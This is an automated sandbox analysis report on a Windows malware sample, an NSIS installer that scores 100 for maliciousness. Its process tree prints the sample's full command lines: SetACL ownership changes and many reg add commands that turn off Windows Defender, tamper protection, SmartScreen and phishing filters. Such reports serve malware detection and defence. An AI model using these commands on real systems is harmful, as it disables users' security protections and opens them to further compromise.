Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3Dut8dFCwD.exe

Overview

General Information

Sample name:3Dut8dFCwD.exe
renamed because original name is a hash value
Original sample name:3f58da2e1652dddab53995166f24993f.exe
Analysis ID:1472091
MD5:3f58da2e1652dddab53995166f24993f
SHA1:1721c19909c2309398d5174f9fcb2abcff51e862
SHA256:d14ee261ed6c5dddc1900587c455991defe0f49c1da1172d7f8f1e163309d3e8
Tags:exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds extensions / path to Windows Defender exclusion list (Registry)
Disable Microsoft Windows Malicious Software Removal Tool Heartbeat Telemetry
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Disables the Smart Screen filter
Disables the phising filter of Microsoft Edge
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses cmd line tools excessively to alter registry or file data
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Windows Defender Exclusions Added - Registry
Too many similar processes found
Uses 32bit PE files
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • 3Dut8dFCwD.exe (PID: 5752 cmdline: "C:\Users\user\Desktop\3Dut8dFCwD.exe" MD5: 3F58DA2E1652DDDAB53995166F24993F)
    • cmd.exe (PID: 5068 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\p64.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SetACL64.exe (PID: 6432 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 3724 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 5884 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 3172 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 4112 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 2668 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 6764 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 5008 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • reg.exe (PID: 1868 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 4760 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 2260 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 3480 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 2436 cmdline: reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 1876 cmdline: reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5828 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 6164 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5276 cmdline: reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5352 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 4128 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 1408 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7080 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5504 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 3176 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 6204 cmdline: reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5084 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 4088 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 6948 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 4856 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 6644 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 3380 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 6472 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 2696 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 3724 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 3660 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5708 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 1772 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7060 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 4280 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup
No configs have been found
No yara matches
Source: Registry Key setAuthor: Christian Burkard (Nextron Systems): Data: Details: 1, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 1772, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\DisableAutoExclusions
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 3Dut8dFCwD.exeAvira: detected
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\PowerRun64.exeReversingLabs: Detection: 20%
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\PowerRun64.exeVirustotal: Detection: 19%Perma Link
Source: 3Dut8dFCwD.exeReversingLabs: Detection: 44%
Source: 3Dut8dFCwD.exeVirustotal: Detection: 45%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\cabweejcuqvpws.exeJoe Sandbox ML: detected
Source: 3Dut8dFCwD.exeJoe Sandbox ML: detected
Source: 3Dut8dFCwD.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 3Dut8dFCwD.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdbG source: SetACL64.exe, 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2067201156.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000000.2069740912.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000002.2070784013.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000000.2071297477.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000002.2072969923.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2073515218.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2074479225.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2077480950.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2075003678.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2080342564.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2079502017.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2080706162.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2081680531.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2082080355.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2083243826.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr
Source: Binary string: D:\Projects\New\win_version_csharp\obj\Release\win_version_csharp.pdb source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, win_version_csharp.exe.0.dr
Source: Binary string: D:\Projects\ConsoleApplication9\ConsoleApplication9\obj\Release\ConsoleApplication9.pdb source: cabweejcuqvpws.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: SetACL64.exe, 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2067201156.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000000.2069740912.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000002.2070784013.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000000.2071297477.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000002.2072969923.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2073515218.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2074479225.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2077480950.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2075003678.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2080342564.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2079502017.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2080706162.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2081680531.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2082080355.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2083243826.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr

Change of critical system settings

barindex
Source: C:\Windows\SysWOW64\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions DisableAutoExclusions
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeCode function: 0_2_00405C40 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C40
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeCode function: 0_2_00406891 FindFirstFileW,FindClose,0_2_00406891
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69708C76C _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,4_2_00007FF69708C76C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF6970596D0 FindFirstFileW,GetLastError,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF6970596D0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69706CF15 MoveFileExW,FindFirstFileW,GetLastError,FindNextFileW,DeleteFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF69706CF15
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69708C76C _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,5_2_00007FF69708C76C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF6970596D0 FindFirstFileW,GetLastError,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,5_2_00007FF6970596D0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69706CF15 MoveFileExW,FindFirstFileW,GetLastError,FindNextFileW,DeleteFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,5_2_00007FF69706CF15
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: PowerRun64.exe.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: PowerRun64.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: PowerRun64.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 3Dut8dFCwD.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://ocsp.digicert.com0O
Source: PowerRun64.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: PowerRun64.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: PowerRun64.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: PowerRun64.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
Source: SetACL64.exe, SetACL64.exe, 00000005.00000000.2069740912.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000002.2070784013.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000000.2071297477.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000002.2072969923.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2073515218.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2074479225.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2077480950.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2075003678.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2080342564.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2079502017.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2080706162.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2081680531.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2082080355.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2083243826.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.drString found in binary or memory: https://helgeklein.com
Source: SetACL64.exe, SetACL64.exe, 00000005.00000000.2069740912.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000002.2070784013.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000000.2071297477.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000002.2072969923.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2073515218.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2074479225.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2077480950.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2075003678.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2080342564.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2079502017.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2080706162.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2081680531.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2082080355.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2083243826.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.drString found in binary or memory: https://helgeklein.com.
Source: SetACL64.exe, SetACL64.exe, 00000005.00000000.2069740912.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000002.2070784013.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000000.2071297477.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000002.2072969923.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2073515218.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2074479225.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2077480950.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2075003678.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2080342564.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2079502017.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2080706162.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2081680531.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2082080355.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2083243826.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.drString found in binary or memory: https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: PowerRun64.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeCode function: 0_2_004056F8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056F8
